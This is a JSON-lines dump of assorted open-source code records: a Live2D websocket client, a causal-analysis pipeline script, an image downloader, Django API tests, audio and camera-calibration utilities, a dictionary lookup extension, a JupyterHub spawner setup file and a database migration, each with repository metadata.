"ipi_pan_model_gensim.py", "file_ext": "py", "file_size_in_byte": 5553, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.splitext", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 47, "usage_type": "call"}, {"api_name": "settings.DATA_PATH", "line_number": 47, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "gensim.models.KeyedVectors.load_word2vec_format", "line_number": 50, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 50, "usage_type": "attribute"}, {"api_name": "gensim.models.keyedvectors.Word2VecKeyedVectors", "line_number": 56, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "settings.DATA_PATH", "line_number": 65, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "settings.DATA_PATH", "line_number": 86, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "scipy.spatial.distance.euclidean", "line_number": 122, "usage_type": "attribute"}, {"api_name": "scipy.spatial.distance", "line_number": 122, "usage_type": "name"}, {"api_name": "scipy.spatial.distance.cityblock", "line_number": 124, "usage_type": "attribute"}, {"api_name": "scipy.spatial.distance", "line_number": 124, "usage_type": "name"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 126, "usage_type": "attribute"}, {"api_name": "scipy.spatial.distance", "line_number": 126, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "settings.DATA_PATH", "line_number": 131, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "deprecated.deprecated", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "44187931888", "text": "import asyncio\r\nimport tkinter as tk\r\nimport json\r\nimport websockets\r\nimport threading\r\nimport time\r\n\r\nclass Simple:\r\n def __init__(self):\r\n try:\r\n self.websocket = None\r\n self.i=0\r\n self.loop = asyncio.new_event_loop()\r\n asyncio.set_event_loop(self.loop)\r\n self.start_connect()\r\n except Exception:\r\n print(\"未开启live2d\")\r\n return OSError\r\n\r\n\r\n async def connect(self):\r\n uri = \"ws://127.0.0.1:10086/api\"\r\n async with websockets.connect(uri) as websocket:\r\n self.websocket = websocket\r\n msg = {\"msg\": 10000, \"msgId\": 1}\r\n await self.websocket.send(json.dumps(msg))\r\n print(\"***连接中***\")\r\n while True:\r\n response = await self.websocket.recv()\r\n if isinstance(response, str):\r\n response = json.loads(response)\r\n msg_value = response.get('msg', None)\r\n if msg_value == 10000:\r\n print(\"***连接成功***\")\r\n self.i=1\r\n print(self.i)\r\n else:\r\n print(response)\r\n\r\n def start_connect(self):\r\n def target():\r\n try:\r\n self.loop.run_until_complete(self.connect())\r\n\r\n except Exception:\r\n print(\"未开启live2d\")\r\n pass\r\n threading.Thread(target=target).start()\r\n\r\n\r\n\r\n\r\n async def send_message(self,text):\r\n msg1 = {\r\n \"msg\": 11000,\r\n \"msgId\": 1,\r\n \"data\": {\r\n \"id\": 0,\r\n \"text\": str(text),\r\n \"textFrameColor\": 0x000000,\r\n \"textColor\": 0xFFFFFF,\r\n \"duration\": 600000,\r\n }\r\n }\r\n msg2 = {\r\n \"msg\": 13200,\r\n \"msgId\": 1,\r\n \"data\": {\r\n \"id\": 0,\r\n \"type\": 0,\r\n \"mtn\": \"talk#3\"\r\n }\r\n }\r\n await self.websocket.send(json.dumps(msg1))\r\n print(\"发送消息\")\r\n await self.websocket.send(json.dumps(msg2))\r\n print(\"更改表情\")\r\n\r\n def call_send_message(self, text):\r\n while True:\r\n if self.i == 1:\r\n asyncio.run(self.send_message(text))\r\n break\r\n\r\n#chat2d=Simple()\r\n#chat2d.call_send_message(\"你好\")", "repo_name": "hz3271/gptchatpet", "sub_path": "call_live2d.py", "file_name": "call_live2d.py", "file_ext": "py", "file_size_in_byte": 2432, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "asyncio.new_event_loop", "line_number": 13, "usage_type": "call"}, {"api_name": "asyncio.set_event_loop", "line_number": 14, "usage_type": "call"}, {"api_name": "websockets.connect", "line_number": 23, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 26, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 31, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 48, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 74, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 76, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "73181860004", "text": "import argparse\nimport json\nimport logging\n\nfrom pathlib import Path\nfrom shutil import copyfile\n\nfrom responsibleai import RAIInsights\n\n\nfrom constants import RAIToolType, DashboardInfo\nfrom rai_component_utilities import (\n load_rai_insights_from_input_port,\n save_to_output_port,\n copy_dashboard_info_file,\n)\nfrom arg_helpers import (\n float_or_json_parser,\n boolean_parser,\n str_or_list_parser,\n int_or_none_parser,\n)\n\n_logger = logging.getLogger(__file__)\nlogging.basicConfig(level=logging.INFO)\n\n\ndef parse_args():\n # setup arg parser\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--rai_insights_dashboard\", type=str, required=True)\n\n parser.add_argument(\"--treatment_features\", type=json.loads, help=\"List[str]\")\n parser.add_argument(\n \"--heterogeneity_features\",\n type=json.loads,\n help=\"Optional[List[str]] use 'null' to skip\",\n )\n parser.add_argument(\"--nuisance_model\", type=str)\n parser.add_argument(\"--heterogeneity_model\", type=str)\n parser.add_argument(\"--alpha\", type=float)\n parser.add_argument(\"--upper_bound_on_cat_expansion\", type=int)\n parser.add_argument(\n \"--treatment_cost\",\n type=float_or_json_parser,\n help=\"Union[float, List[Union[float, np.ndarray]]]\",\n )\n parser.add_argument(\"--min_tree_leaf_samples\", type=int)\n parser.add_argument(\"--max_tree_depth\", type=int)\n parser.add_argument(\"--skip_cat_limit_checks\", type=boolean_parser)\n parser.add_argument(\"--categories\", type=str_or_list_parser)\n parser.add_argument(\"--n_jobs\", type=int)\n parser.add_argument(\"--verbose\", type=int)\n parser.add_argument(\"--random_state\", type=int_or_none_parser)\n\n parser.add_argument(\"--causal_path\", type=str)\n\n # parse args\n args = parser.parse_args()\n\n # return args\n return args\n\n\ndef main(args):\n # Load the RAI Insights object\n rai_i: RAIInsights = load_rai_insights_from_input_port(args.rai_insights_dashboard)\n\n # Add the causal analysis\n rai_i.causal.add(\n treatment_features=args.treatment_features,\n heterogeneity_features=args.heterogeneity_features,\n nuisance_model=args.nuisance_model,\n heterogeneity_model=args.heterogeneity_model,\n alpha=args.alpha,\n upper_bound_on_cat_expansion=args.upper_bound_on_cat_expansion,\n treatment_cost=args.treatment_cost,\n min_tree_leaf_samples=args.min_tree_leaf_samples,\n max_tree_depth=args.max_tree_depth,\n skip_cat_limit_checks=args.skip_cat_limit_checks,\n categories=args.categories,\n n_jobs=args.n_jobs,\n verbose=args.verbose,\n random_state=args.random_state,\n )\n _logger.info(\"Added causal\")\n\n # Compute\n rai_i.compute()\n _logger.info(\"Computation complete\")\n\n # Save\n save_to_output_port(rai_i, args.causal_path, RAIToolType.CAUSAL)\n _logger.info(\"Saved computation to output port\")\n\n # Copy the dashboard info file\n copy_dashboard_info_file(args.rai_insights_dashboard, args.causal_path)\n\n _logger.info(\"Completing\")\n\n\n# run script\nif __name__ == \"__main__\":\n # add space in logs\n print(\"*\" * 60)\n print(\"\\n\\n\")\n\n # parse args\n args = parse_args()\n\n # run main function\n main(args)\n\n # add space in logs\n print(\"*\" * 60)\n print(\"\\n\\n\")\n", "repo_name": "Azure/AutoML-vNext-Preview", "sub_path": "src/responsibleai/rai_analyse/create_causal.py", "file_name": "create_causal.py", "file_ext": "py", "file_size_in_byte": 3326, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 24, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 25, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 30, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 37, "usage_type": "attribute"}, {"api_name": "arg_helpers.float_or_json_parser", "line_number": 46, "usage_type": "name"}, {"api_name": "arg_helpers.boolean_parser", "line_number": 51, "usage_type": "name"}, {"api_name": "arg_helpers.str_or_list_parser", "line_number": 52, "usage_type": "name"}, {"api_name": "arg_helpers.int_or_none_parser", "line_number": 55, "usage_type": "name"}, {"api_name": "responsibleai.RAIInsights", "line_number": 68, "usage_type": "name"}, {"api_name": "rai_component_utilities.load_rai_insights_from_input_port", "line_number": 68, "usage_type": "call"}, {"api_name": "rai_component_utilities.save_to_output_port", "line_number": 94, "usage_type": "call"}, {"api_name": "constants.RAIToolType.CAUSAL", "line_number": 94, "usage_type": "attribute"}, {"api_name": "constants.RAIToolType", "line_number": 94, "usage_type": "name"}, {"api_name": "rai_component_utilities.copy_dashboard_info_file", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "72132833124", "text": "#!/usr/bin/env python\n\nimport requests, os, shutil, subprocess\n\nauth_url = 'https://www.deviantart.com/oauth2/token'\n\nauth_post_body = {\n 'grant_type': 'client_credentials',\n 'client_id': os.environ['CLIENT_ID'],\n 'client_secret': os.environ['CLIENT_SECRET']\n}\n\nauth_json = requests.post(auth_url, auth_post_body).json()\naccess_token = auth_json['access_token']\n\ndd_url = 'https://www.deviantart.com/api/v1/oauth2/browse/dailydeviations?access_token=' + access_token\ndd_json = requests.get(dd_url).json()\n\nif os.path.exists('./deviations'):\n shutil.rmtree('./deviations')\nos.mkdir('./deviations')\n\nfile_count = 0\n\nfor deviation in dd_json['results']:\n if 'content' in deviation:\n image = requests.get(deviation['content']['src'])\n filename = './deviations/' + str(file_count) + '.jpg'\n open(filename, 'wb').write(image.content)\n file_count += 1\n\nsubprocess.run('fbi -noverbose -a -t 10 ./deviations/*.jpg', shell=True)\n", "repo_name": "ericsolomon/dds", "sub_path": "dds.py", "file_name": "dds.py", "file_ext": "py", "file_size_in_byte": 962, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 13, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 20, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 27, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "23744179367", "text": "import pytest\nfrom django.urls import reverse\nfrom rest_framework import status\n\nfrom goals.serializers import GoalCategorySerializer\n\n\n@pytest.mark.django_db\nclass TestCategoriesList:\n url = reverse('goals:list_of_categories')\n\n def test_get_list(self, auth_client, board, category_factory):\n board, category = board\n categories = category_factory.create_batch(2, board=board)\n\n response = auth_client.get(self.url)\n\n assert response.status_code == status.HTTP_200_OK\n for cat in GoalCategorySerializer(categories, many=True).data:\n assert cat in response.data\n\n def test_can_not_get_list_from_an_alien_board(self, auth_client, alien_board,\n category_factory):\n board, _ = alien_board\n category_factory.create_batch(2, board=board)\n\n response = auth_client.get(self.url)\n\n assert response.data == []\n\n def test_get_list_from_an_alien_board_as_a_writer(self, auth_client, alien_board_writer,\n category_factory):\n board, _ = alien_board_writer\n categories = category_factory.create_batch(2, board=board)\n\n response = auth_client.get(self.url)\n\n assert response.status_code == status.HTTP_200_OK\n for cat in GoalCategorySerializer(categories, many=True).data:\n assert cat in response.data\n\n def test_get_list_from_an_alien_board_as_a_reader(self, auth_client, alien_board_reader,\n category_factory):\n board, _ = alien_board_reader\n categories = category_factory.create_batch(2, board=board)\n\n response = auth_client.get(self.url)\n\n assert response.status_code == status.HTTP_200_OK\n for cat in GoalCategorySerializer(categories, many=True).data:\n assert cat in response.data\n\n def test_get_list_unauthorized(self, client):\n response = client.get(self.url)\n\n assert response.status_code == status.HTTP_403_FORBIDDEN\n\n def test_pagination(self, auth_client, board, category_factory):\n board, _ = board\n category_factory.create_batch(15, board=board)\n\n limit_response = auth_client.get(self.url, {'limit': 5})\n\n assert limit_response.status_code == status.HTTP_200_OK\n assert limit_response.json()['count'] == 16\n assert len(limit_response.json()['results']) == 5\n\n offset_response = auth_client.get(self.url, {'limit': 15, 'offset': 5})\n\n assert offset_response.status_code == status.HTTP_200_OK\n assert offset_response.json()['count'] == 16\n assert len(offset_response.json()['results']) == 11\n\n def test_ordering_by_title(self, auth_client, category_factory, board):\n board, category = board\n category.title = 'Test'\n category.save()\n for title in ['Test title', 'Title', 'New title']:\n category_factory.create(title=title, board=board)\n\n response = auth_client.get(self.url)\n assert response.status_code == status.HTTP_200_OK\n assert [goal['title'] for goal in response.json()] == ['New title', 'Test', 'Test title', 'Title']\n", "repo_name": "Alstacon/ToDoCon", "sub_path": "tests/goals/category/test_categories_list.py", "file_name": "test_categories_list.py", "file_ext": "py", "file_size_in_byte": 3214, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.reverse", "line_number": 10, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 18, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 18, "usage_type": "name"}, {"api_name": "goals.serializers.GoalCategorySerializer", "line_number": 19, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 38, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 38, "usage_type": "name"}, {"api_name": "goals.serializers.GoalCategorySerializer", "line_number": 39, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 49, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 49, "usage_type": "name"}, {"api_name": "goals.serializers.GoalCategorySerializer", "line_number": 50, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_403_FORBIDDEN", "line_number": 56, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 56, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 64, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 64, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 70, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 70, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 82, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 82, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 8, "usage_type": "attribute"}]} +{"seq_id": "24962835357", "text": "import librosa\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef load_audio_file(file_path, sample_rate = 16000):\n signal, sr = librosa.load(file_path, sr=sample_rate)\n return signal, sr\n\ndef compute_fft(signal, sample_rate = 16000):\n fft_result= np.fft.fft(signal)\n frequencies = np.fft.fftfreq(len(signal), 1.0/sample_rate)\n frequencies = frequencies[:int(len(frequencies)/2)] \n fft_result = fft_result[:int(len(fft_result)/2)]\n return frequencies, fft_result\n\ndef compute_power_spectrum(signal, sample_rate = 16000):\n frequencies, fft_result = compute_fft(signal, sample_rate)\n power_spectrum = np.abs(fft_result)**2 / len(signal)\n return frequencies, power_spectrum\n\ndef plot_power_spectrum(signal, sample_rate = 16000):\n frequencies, power_spectrum = compute_power_spectrum(signal, sample_rate)\n plt.ion()\n plt.clf()\n plt.plot(frequencies, power_spectrum)\n plt.xlabel('Frequency (Hz)')\n plt.ylabel('Power')\n plt.grid(alpha=0.3)\n plt.show()\n\ndef frequency_band_to_db(freq_lower_bound, freq_upper_band, frequencies, power_spectrum,\n baseline_power = 10**-12):\n lower_index = np.where(frequencies >= freq_lower_bound)[0][0]\n upper_index = np.where(frequencies <= freq_upper_band)[0][-1]\n power = np.sum(power_spectrum[lower_index:upper_index])\n return 10 * np.log10(power / baseline_power)\n", "repo_name": "martijnbentum/E2ELD-cautious-fiesta", "sub_path": "frequency_band.py", "file_name": "frequency_band.py", "file_ext": "py", "file_size_in_byte": 1367, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "librosa.load", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.fft.fft", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 10, "usage_type": "attribute"}, {"api_name": "numpy.fft.fftfreq", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.fft", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.clf", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "23174184419", "text": "import numpy as np\nimport glob\nimport cv2\nimport pickle\n\n#prepare object points\nobjp = np.zeros((6*9,3), np.float32)\nobjp[:,:2] = np.mgrid[0:9,0:6].T.reshape(-1,2)\n\nobjpoints = []\nimgpoints = []\n\n# Fetch a bunch of images for calibration\nimages = glob.glob('./camera_cal/calibration*.jpg')\n\n# Process each image\nfor idx, filename in enumerate(images):\n\t#print(filename)\n\timg = cv2.imread(filename)\n\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t\n\t# Find corners of the chessboard\n\tret, corners = cv2.findChessboardCorners(gray,(9,6), None)\n\t\n\tif ret == True:\n\t\tobjpoints.append(objp)\n\t\timgpoints.append(corners)\n\t\t\n\t\t# Draw the corners on the chessboard and save the images\n\t\tcv2.drawChessboardCorners(img,(9,6), corners, ret)\n\t\twname = './camera_cal/chesscorners'+str(idx)+'.jpg'\n\t\tcv2.imwrite(wname, img)\n\t\t\nimg = cv2.imread('./camera_cal/calibration1.jpg')\nsize = (img.shape[1],img.shape[0])\n\n# Generate required matrices\nret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, gray.shape[::-1], None, None)\n\nundist = cv2.undistort(img, mtx, dist, None, mtx)\n\nwname = './output_images/undistorted.jpg'\ncv2.imwrite(wname, undist)\n\t\n# Save the required matrices in a pickle file\npickle_data = {}\npickle_data[\"mtx\"] = mtx\npickle_data[\"dist\"] = dist\npickle.dump(pickle_data, open(\"./camera_cal/calibration_pickle.p\",\"wb\"))\n", "repo_name": "sunny1986/SDC_P4_Advanced_Lane_Search", "sub_path": "camera_calibration.py", "file_name": "camera_calibration.py", "file_ext": "py", "file_size_in_byte": 1339, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.zeros", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 7, "usage_type": "attribute"}, {"api_name": "numpy.mgrid", "line_number": 8, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cv2.findChessboardCorners", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.drawChessboardCorners", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 32, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.calibrateCamera", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.undistort", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 43, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "26045425861", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"This is a simple python template extension.\n\nThis extension should show the API in a comprehensible way. Use the module docstring to provide a \\\ndescription of the extension. The docstring should have three paragraphs: A brief description in \\\nthe first line, an optional elaborate description of the plugin, and finally the synopsis of the \\\nextension.\n\nSynopsis: [delay|throw] \"\"\"\nfrom albert import *\nimport os\nimport requests\nimport json\nimport re\nimport pickle\nimport dataparser\n\n__title__ = \"Merriam-Webster Dictionary lookup\"\n__version__ = \"0.0.2\"\n__triggers__ = \"mw \"\n__authors__ = \"mrlys\"\n__py_deps__ = [\"requests\", \"json\", \"re\", \"pickle\"]\n#__exec_deps__ =\n\niconPath = iconLookup(\"albert\")\ndb_file = '.webster_db'\nkey = os.environ['WEBSTER_KEY']\nsearch_url = 'https://www.dictionaryapi.com/api/v3/references/collegiate/json/%s?key='+key\n\n\n# Can be omitted\ndef initialize():\n pass\n\n\n# Can be omitted\ndef finalize():\n pass\n\ndef handleQuery(query):\n if not query.isTriggered:\n return\n\n # Note that when storing a reference to query, e.g. in a closure, you must not use\n # query.isValid. Apart from the query beeing invalid anyway it will crash the appplication.\n # The Python type holds a pointer to the C++ type used for isValid(). The C++ type will be\n # deleted when the query is finished. Therfore getting isValid will result in a SEGFAULT.\n\n if not len(query.string) > 2:\n item = Item()\n item.icon = iconPath\n item.text = '%s' % query.string\n item.subtext = 'At least 3 characters'\n return [item]\n db = {}\n if os.path.exists(db_file):\n debug(\"db file exists\")\n infile = open(db_file, 'rb')\n db = pickle.load(infile)\n infile.close()\n debug(\"db: \" + str(db))\n info(query.string)\n info(query.rawString)\n info(query.trigger)\n info(str(query.isTriggered))\n info(str(query.isValid))\n\n critical(query.string)\n warning(query.string)\n debug(query.string)\n debug(query.string)\n\n results = []\n if query.string in db:\n res = db[query.string]\n else:\n res = requests.get(search_url % query.string)\n json_result = res.json()\n\n info(json_result)\n data = dataparser.parse_data(json_result)\n db[query.string] = data\n data = db[query.string]\n if 'suggestions' in data:\n data = data['suggestions']\n for unit in data:\n item = Item(id=__title__,\n icon=os.path.dirname(__file__) + \"/uib_ordbok.png\",\n text='%s' % unit,\n subtext='Suggestion',\n completion=__triggers__ + '%s' % unit,\n urgency=ItemBase.Notification,\n actions=[])\n results.append(item)\n elif 'defs' in data:\n data = data['defs']\n for unit in data:\n item = Item(id=__title__,\n icon=os.path.dirname(__file__) + \"/uib_ordbok.png\",\n text='%s' % query.string,\n subtext=unit,\n completion=__triggers__ + '%s' % unit,\n urgency=ItemBase.Notification,\n actions=[])\n results.append(item)\n\n # Api v 0.2\n info(configLocation())\n info(cacheLocation())\n info(dataLocation())\n outfile = open(db_file, 'wb')\n pickle.dump(db, outfile)\n outfile.close()\n return results\n", "repo_name": "MrLys/albert_merriam_webster", "sub_path": "__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 3512, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 60, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 78, "usage_type": "call"}, {"api_name": "dataparser.parse_data", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 113, "usage_type": "call"}]} +{"seq_id": "907599222", "text": "from __future__ import print_function\n\nimport os\nimport sys\n\nv = sys.version_info\nif v[:2] < (3,3):\n error = \"ERROR: Jupyter Hub requires Python version 3.3 or above.\"\n print(error, file=sys.stderr)\n sys.exit(1)\n\n\nif os.name in ('nt', 'dos'):\n error = \"ERROR: Windows is not supported\"\n print(error, file=sys.stderr)\n\n\nfrom setuptools import setup\n\npjoin = os.path.join\nhere = os.path.abspath(os.path.dirname(__file__))\n\n# Get the current package version.\nversion_ns = {}\n\nfrom setuptools.command.bdist_egg import bdist_egg\nclass bdist_egg_disabled(bdist_egg):\n \"\"\"Disabled version of bdist_egg\n Prevents setup.py install from performing setuptools' default easy_install,\n which it should never ever do.\n \"\"\"\n def run(self):\n sys.exit(\"Aborting implicit building of eggs. Use `pip install .` to install from source.\")\n\nsetup_args = dict(\n name = 'remotesingularityspawner',\n packages = ['remotesingularityspawner'],\n version = \"0.0.4\",\n description = \"\"\"RemoteSingularitySpawner: A custom spawner for Jupyterhub in singularity container.\"\"\",\n long_description = \"\",\n author = \"xinping fan\",\n author_email = \"897488736@qq.com\",\n url = \"https://github.com/fanxinping/remotesingularityspawner\",\n download_url = \"https://github.com/fanxinping/remotesingularityspawner/archive/v0.0.4.tar.gz\",\n license = \"BSD\",\n platforms = \"Linux, Mac OS X\",\n keywords = ['Interactive', 'Interpreter', 'Shell', 'Web'],\n classifiers = [\n 'Intended Audience :: Developers',\n 'Intended Audience :: System Administrators',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n ],\n install_requires = [\n 'paramiko'],\n entry_points={\n 'jupyterhub.spawners': [\n 'remote-singularity-spawner = remotesingularityspawner:RemoteSingularitySpawner'\n ],\n },\n cmdclass = {\n 'bdist_egg': bdist_egg if 'bdist_egg' in sys.argv else bdist_egg_disabled,\n }\n)\n\n\ndef main():\n setup(**setup_args)\n\nif __name__ == '__main__':\n main()\n", "repo_name": "fanxinping/remotesingularityspawner", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 2310, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.version_info", "line_number": 6, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 10, "usage_type": "call"}, {"api_name": "os.name", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 21, "usage_type": "call"}, {"api_name": "setuptools.command.bdist_egg.bdist_egg", "line_number": 27, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 33, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 64, "usage_type": "attribute"}, {"api_name": "setuptools.command.bdist_egg.bdist_egg", "line_number": 64, "usage_type": "name"}, {"api_name": "setuptools.setup", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "70470620006", "text": "\"\"\"Restore price column\n\nRevision ID: 4d1e3cd2d723\nRevises: 078505ddf451\nCreate Date: 2020-03-29 20:02:35.023163\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '4d1e3cd2d723'\ndown_revision = '078505ddf451'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('books', sa.Column('price', postgresql.MONEY(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('books', 'price')\n 